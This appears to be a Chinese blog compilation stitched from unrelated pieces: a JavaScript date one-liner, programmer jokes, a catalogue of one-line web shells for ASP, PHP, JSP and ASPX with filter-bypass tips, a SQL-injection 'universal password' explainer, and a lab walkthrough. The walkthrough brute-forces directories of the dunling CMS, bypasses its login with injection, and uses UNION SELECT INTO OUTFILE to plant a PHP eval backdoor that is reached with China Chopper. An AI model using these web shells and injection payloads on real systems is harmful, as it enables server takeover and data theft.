一句话搞定日期减一年
 
 
new Date(new Date()-365*24*60*60*1000).getFullYear()+'-'+(new Date(new Date()-365*24*60*60*1000).getMonth()+1<10?'0'+(new Date(new Date()-365*24*60*60*1000).getMonth()+1):(new Date(new Date()-365*24*60*60*1000).getMonth()+1))+'-'+(new Date(new Date()-365*24*60*60*1000).getDate()<10?'0'+new Date(new Date()-365*24*60*60*1000).getDate():new Date(new Date()-365*24*60*60*1000).getDate())
 
详细逻辑如下：
 
 
 localdate = new Date(); //Sat Jul 20 2013 10:43:36 GMT+0800 (中国标准时间)
 lastyear= new Date(localdate -365*24*60*60*1000); //Fri Jul 20 2012 10:43:36 GMT+0800 (中国标准时间) 减一个月只需要把365改为30即可 
 year=lastyear.getFullYear(); //2012
 month = lastyear.getMonth()+1; //7
 month = month<10?'0'+month:month; //"07"
 day = lastyear.getDate();//20
 day = day<10?'0'+day:day;//"20"
 LastYear = year+'-'+month+'-'+day; //"2012-07-20"

 

 
 
 
 

 
 

 
 
他们智商异于常人
 
情商略显感人
 
思维逻辑性强，内心理性且细腻
 

 
他们的雄心壮志是：
 
给我一台电脑，我便能转动整个地球
 
江湖上从不缺乏他们的传说
 
他们低调有张扬
 
低调到你只能听到他们的传说
 
高调到他们有“统一的服装”
 

 
他们就是程序员
 
用一句话证明你是程序员
 
在大家发挥自己的聪明才智之前
 
学姐为大家分享一些网友的精彩回答
 
1、女朋友就是私有变量，只有我这个类才能调用
 


 
2、问君能有几多愁，恰似产品经理天天改需求！
 


 
3、编码间，bug灰飞烟灭
 


 
4、这句话老值钱了：Helloworld
 


 
5、1+2==3
 


 
6、老板凑个整数吧，1024
 


 
7、你说第一句? 从0算起还是从1算起
 


 
8、不管写什么，没事在后面加个分号
 


 
9、真产品有三宝:弹窗、浮层加引导；
 
     设计有三宝:透明、阴影加圆角；
 
     运营有三宝:短信、push加红包；
 
     程序员有一宝:这个做不了！！！
 


 
10、神马，我打开firebug看看那玩意怎么实现的。
 


 
11、生日快乐~祝你一次编译，永无bug
 


 
12、继承，是幸福的延续;重载，是幸福的重生。
 


 
13、我走过最远的路，就是我写的死循环
 


 
14、PHP 是最好的语言！
 


 
15、hello world
 


 
16、烫烫烫烫烫烫烫烫
 
下面到了你们的show time
 
欢迎留言
 
学姐召唤神回复
 
—   T H E  E N D   —
 


 


 
精彩回顾
 
♡ 程序员究竟能干多少年？
 
♡ 互联网公司各岗位真实工作内容起底
 
♡ 一次尴尬的采访和程序员的传奇脑洞！
 
♡ 天一冷，程序员都穿上格子衫
 
♡ 史上最真实的行业鄙视链曝光
 
♡ IT公司老板落水，各部门员工怎么救
 
♡ 宿命之战：程序员VS产品经理
 
♡ 作为一个前端，可以如何机智地弄坏一台电脑？
 
♡ 程序员跟产品经理打起来了，这是一个需求引发的血案...
 
♡ 后端说，你个前端不会用 headers吧，我怒了！
 
♡ 有个厉害的程序员女朋友是什么体验？
 
♡ 多年来，程序员经常加班的真相终于揭开了…
 


 
 

 asp一句话木马
 程序代码
 < %eval request("a")%>
 程序代码
 < %execute request("a")%>
 程序代码
 < %execute(request("a"))%>
 程序代码
 < %execute request("a")%><%'<% loop <%:%>
 程序代码
 < %'<% loop <%:%><%execute request("a")%>
 程序代码
 < %execute request("a")'<% loop <%:%>[code]
 [code]<script language=vbs runat=server>eval_r(request("a"))</script>
 程序代码
 %><%eval_r(Request(chr(35)))%><%
 程序代码
 < %eval request("a")%>
 程序代码
 < %ExecuteGlobal request("a")%>
 程序代码
 if Request("a")<>"" then ExecuteGlobal request("a") end if
 //容错代码
 
 程序代码
 < " CODEPAGE="65001"%>
 < %
 var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一
 
 声老大'};
 lcx.性别((lcx.名字)+'');
 %>
 //使用冰狐一句话客户端链接
 程序代码
 < %
 Set o = Server.CreateObject("ScriptControl")
 o.language = "vbscript"
 o.addcode(Request("SubCode")) '参数SubCode作为过程代码
 o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之，同时压入6
 
 个基对象作为参数
 %>
 
 调用示例：
 
 程序代码
 http://localhost/tmp.asp?SubCode=sub e(Server,Response,Request,Application,Session,Error) eval_r(request("v")) end sub&v=response.write(server.mappath("tmp.asp"))
 php一句话
 程序代码
 < ?php eval_r($_POST[a])?>
 程序代码
 < ?php @eval_r($_POST[a])?>
 //容错代码
 
 程序代码
 < ?php assert($_POST[a]);?>
 //使用lanker一句话客户端的专家模式执行相关的php语句
 
 程序代码
 < ?$_POST['sa']($_POST['a']);?>
 程序代码
 < ?$_POST['sa']($_POST['a'],$_POST['sc'])?>
 程序代码
 < ?php
 @preg_replace("/[email]/e",$_POST['h'],"error");
 ?>
 //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
 
 程序代码
 <O>h=@eval_r($_POST[c]);</O>
 
 程序代码
 <script language="php">@eval_r($_POST[a])</script>
 //绕过<?限制的一句话
 
 JSP一句话
 程序代码
 < %
 if(request.getParameter("f")!=null)(new java.io.FileOutputStream
 
 (application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter
 
 ("t").getBytes());
 %>
 提交客户端
 程序代码
 <form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
 < textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
 < input type=submit value="提交">
 < /form>
 
 ASPX一句话
 
 程序代码
 < %@ Page Language="Jscript"%><%eval_r(Request.Item["pass"],"unsafe");%>
 
 程序代码
 
 <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval_r(Request.Item["w"],"unsafe"));%>
 //Jscript的asp.net一句话
 程序代码
 < %if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
 //C#的asp.net一句话
 程序代码
 < % If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request ("f")) ) %>
 VB的asp.net一句话
 
 第一:114la网址导航系统后台getwebshell,最新版本,已经禁止了直接输入<?php这样的代码
 所以可以试用<script language="php">...<script>来绕过
 
 第二,使用菜刀的附加数据功能可以出现很多转换.所以还是仔细阅读下菜刀的readme.txt,上面的代
 
 码来自LCX的博客
 
 第三,使用mssql备份一句话的时候,特别是asp.net和jsp,因为代码过长,所以,需要再代码前面和后
 
 面多加空格等垃圾字符保证代码完整性,这个跟备份bat到启动项一个原理.
 
  
 
 
 如果一个网站的前台都是注入漏洞，那么凭经验，万能密码进后台的几率基本上百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启，就会对特殊符号转义，就彻底杜绝了PHP注入。其实说这话的人没有好好想过，更没有尝试过用万能密码进PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。
 
 　　如果你用这样的万能密码‘or’='or’，当然进不去，理由是GPC开启的时候单引号会被转换。
 
 　　PHP注入时我常用的万能密码是：‘or 1=1后面的东西被注释掉了），name=’’的逻辑值为假，而后面的1=1逻辑值则为真，对于整体就成了假 or 真，最终的逻辑值还是真，就进后台了。
 
 
 　　那么如果GPC转换开启了，就对单引号进行了转换。语句就变成了where name=’'or 1=1,再看一下和刚才有什么区别，无非是多了个。name=’‘与name=’’的逻辑值一样，都为假，那1=1为真，总的sql语句的逻辑值不还是真吗？那有进不去后台的理由吗？
 
 　　所以总的来说，php网站的万能密码可以这样写：‘or 1=1/*，而GPC转换是否开启对它没有任何影响！
 
 　　所以请改变你的想法：存在字符型注入的php网站是可以用万能密码’or 1=1/*的

 
 
环境
 
 
Windows Server 2008（虚拟机）   安装phpStudy，安装dunling
 
 
盾灵投稿系统
 
 
dunling是一个CMS在线内容管理器
 
 
dirb是Kali内置的一个基于字典的Web目录扫描工具，用来爆破目录的
 
 
假设已经知道管理员的登陆用户名是admin
 
 
 
 
 
 
实验演示
 
 
①在Windows Server 2008中安装phpStudy，关闭防火墙
 
 
下载盾灵源码，将盾灵文件夹放在phpstudy下：C:\phpStudy\PHPTutorial\WWW
 
 
看一下Windows Server的IP，是192.168.244.200
 
 
 
 
看一下本机ip，192.168.1.102
 
 
 
 
ping一下，看是否能ping通
 
 
 
 
ok可以ping通
 
 
 
 
 
这样，在本机访问192.168.244.200
 
 
 
 
这样访问会直接访问WinServer的C:\phpStudy\PHPTutorial\WWW 文件夹
 
 
有一个默认的index来输出“Hello World”
 
 
 
 
 
 
 
我们访问 http://192.168.244.200/dunling/， 就可以看到盾灵原创投稿系统的这个页面了
 
 
 
 
 
 
 
然后我们对这台服务器进行目录爆破
 
 
        dirb http://192.168.244.200
 
 
前面带加号的表示它在尝试这些目录
 
 
 
 
 
 
没发现什么很有价值的信息
 
 
再对dunling目录进行爆破
 
 
    dirb http://192.168.244.200/dunling   
 
 
 
 
看到有一个admin目录，进去看一下
 
 
 
 
进去是这个，判断它应该就是网站的后台管理员登陆页面
 
 
 
 
 
然后尝试看这个页面有没有注入点（我们假设的是已经知道了登录用户名是admin，不然这个实验不好做）
 
 
存在注入点的页面，举个例子，它的源码是这样的，就是把我们输入的用户名和密码直接带入到这里面来
 
 
当我们知道了正确的用户名的时候，在输入用户名的时候给他闭合单引号然后把后面的注释掉，就可以登录进去了
 
 
 
 
 
在这里输入admin之后想再输入’ 却输入不进去
 
 
 
 
看源码发现他这有一个对符号的过滤
 
 
那就上burp吧-_-
 
 
打开burp发现爆了个提示8080端口被占用了，然后进到proxy中的options发现running勾选不了
 
 
 
 
 
 
我们进到命令行，查找一下占用8080端口的程序
 
 
      netstat -nao |findstr "8080"
 
 
 
 
然后进到任务管理器，将PID为7192的进程杀掉
 
 
 
 
之后就发现可以勾选了
 
 
 
 
然后打开浏览器的FoxyProxy插件，启动它
 
 
burp的作用是拦截所有从本机通过8080端口进出的数据包
 foxyproxy的作用是让浏览器产生的数据都通过8080端口流出
 
 
 
 
这样在浏览器上再访问页面时，就会自动跳转到burp，然后浏览器是显示等待访问网站的应答，而burp就是捕获到这个数据包
 
 
 
 
 
 
在burp里我们就可以在admin后面添加我们想进行sql注入的内容了（之前在页面上提交不了因为页面有过滤）
 
 
这里构造   
 
 
         admin'or 1=1 --+
 
 
然后Forward进行转发（如果1次不成功，多点几次，或者之间点击Intercept is on 给关掉，这样就绝对转发过去了）
 
 
 
 
然后浏览器的页面就变成这样了，就可以进去了
 
 
 
 
现在我们进入到了后台，我们的目的是拿到它服务器主机的权限
 
 
Sql注入手工三部曲
 
      ①逻辑判断是否存在注入点 
 
      ②判断字段值
 
      ③注入
 
 
 
我们来到会员管理
 
 
 
 
我们在账号里输入一个1，然后点搜索。
 
 
看页面的返回形式判断可能有注入点
 192.168.244.200/dunling/admin/income.php?t=uid&jq=1
 
 
 
 
（注意这里判断有注入点必须搜的是存在的账号，这里我们之前看到只有1个UID为1的，所以只能是1。因为只有它正确得搜出来了你才能判断有注入点，如果是一个不存在的账号，和那些一样，你根本不能判断有没有注入点，都是被他拒绝了。就是必须得返回true的时候才能确定这里有注入点）
 
 
接下来确定它的字段值，就是找它到底有多少个
 
 
sql注入的格式order by
 
 
        192.168.244.200/dunling/admin/income.php?t=uid&jq=1' order by 1 --+
 
 
下面分别是成功的场景和失败的场景
 
 
 
 
所以使用二分法的思想，来确定它的字段值个数
 
 
确定出来它总共有22个，到了order by 23就不行了
 
 
然后来进行联合查询，把22个字段值都查询出来
 
 
192.168.244.200/dunling/admin/income.php?t=uid&jq=1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --+
 
 
 
 
然后在这里我们可以进行一些其他的操作
 
 
database()是显示数据库名
 
 
这里将2替换成database(),在之前2的位置就会是运行database()的结果
 
 
,
 
 
@@datadir   当前绝对路径
 
 
注意之前显示的是，1,2,9，所以只能在这3个地方改变
 
 
 
 
select into outfile   将select后面的内容都写进文件里（写在对方的主机上）
 
 
 
192.168.244.200/dunling/admin/income.php?t=uid&jq=1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 into outfile 'C:\\text.txt' --+
 
 
（注意路径要加单引号）
 
 
 
 
这样在对方的C盘下就出现了一个text文件
 
 
 
 
但是文件内容有点怪，前面是一些我不太明白，莫名奇妙出现的内容，从后面开始才是我们写入的1，2，3，...，22
 
 
 
 
 
 
 
我们想控制对方主机，想采用的方法就是给对方电脑里写个一句话木马，然后用菜刀去连接
 
 
一句话木马：
 
 
        <?php @eval($_POST[cmd])?>
 
 
（eval是执行前端传输过来的命令。@是错误回显，不加也能执行，只不过不能回显错误了
 
 
   以POST方式接受命令，cmd是变量名，具体的cmd值是我们后面用菜刀传进去的）
 
 
 
 
 
这次这个木马要写到对方主机的WWW目录下，新建一个文件，就叫text.php吧
 
 
注意如果是从电脑里直接复制过来文件夹的目录，是单斜杠\，是不行的，必须要双斜杠\\
 
 
(Windows是\\, Unix,Linux是//)
 
 
 
 
 
192.168.244.200/dunling/admin/income.php?t=uid&jq=1' union all select '<?php @eval($_POST[cmd])?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\test.php' --+
 
 
（注意一句话木马要加‘’）
 
 
（如果路径是这种 http://192.168.244.200/dunling/admin/income.php?t=uid&jq=1%27%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20into%20outfile%20%27C:\\text.txt%27%20--+ 是经过url编码了的）
 
%20是空格
 %27是'
 
 
 
执行之后在对方主机的WWW目录下就出现了一个text.php文件
 
 
 
 
可以看到一句话木马已经写进去了
 
 
 
 
php文件只会/解析执行php语句，里面的非php语句不会管
 
 
这样，我们来执行这个text.php文件或者用菜刀连接它，就可以利用文件里的一句话木马来进行相关操作了
 
 
 
 
 
我们打开菜刀
 
 
连接路径要直接写到test.php文件，然后后面写上cmd字段值（菜刀就是利用cmd这个变量让对方一句话木马执行然后拿到shell了）
 
 
 
 
成功连接